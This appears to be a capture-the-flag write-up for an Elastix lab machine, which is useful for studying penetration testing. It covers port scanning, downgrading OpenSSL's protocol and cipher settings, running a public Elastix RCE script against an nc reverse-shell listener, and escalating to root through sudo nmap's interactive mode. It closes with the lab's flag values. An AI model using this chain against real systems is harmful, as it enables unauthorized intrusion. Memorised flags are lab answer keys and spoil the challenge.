nmap -T4 -p- -A -Pn -v
nmap --script vuln
sudo vim /etc/ssl/openssl.cnf
#at end of config file
#edit MinProtocol = None and CipherString = None
vim elastix-rce.py
#modify exploit
python elastix-rce.py
nc -nvlp 4444
#setup listener for reverse shell from running exploit
#we get reverse shell
sudo -l
#we have multiple services that can be run as root without password
sudo /usr/bin/nmap --interactive
#in nmap prompt
#we have root shell
Open ports & services:
- 22 - ssh - OpenSSH 4.3 (protocol 2.0)
- 25 - smtp - Postfix smtpd
- 80 - http - Apache httpd 2.2.3
- 110 - pop3 - Cyrus pop3d
- 111 - rpcbind
- 143 - imap - Cyrus imapd
- 443 - ssl/http - Apache httpd 2.2.3
- 993 - ssl/imap - Cyrus imapd
- 995 - pop3 - Cyrus pop3d
- 3306 - mysql - mysql
- 4190 - sieve - Cyrus timsieved
- 4559 - HylaFAX 4.3.10
- 5038 - asterisk - Asterisk Call Manager 1.1
- 10000 - http - Miniserv 1.570 (Webmin httpd)
We can begin enumerating the services one-by-one.
We are unable to access the webpages using SSL due to an unsupported version error - this can be resolved by modifying the browser settings to accept older SSL cert versions.
Now, accessing, we encounter a login page for
. -
The same webpage is hosted on port 443 as well; we can enumerate other ports with similar services.
Checking, we have a Webmin login page.
Now, we are unable to fuzz these webpages, so we will have to lower our SSL security level by modifying configuration as well.
In the openssl config file, we have to edit both MinProtocol and CipherString values to None.
Now, Googling for exploits related to Elastix gives us a Python script.
Modifying & running this script allows us to get a reverse shell at out listener; we get shell as 'asterisk'.
Now, using
sudo -l
, we can see that there are multiple paths to become root - we can choose any service from the list and run as root. -
Getting the exploit from GTFObins for 'nmap' in this instance, we can run the commands and get root shell.
1. User flag - a075b54365b5e47329554cc18878f1d4
2. Root flag - 08afd44761440352b3db6f139c318dba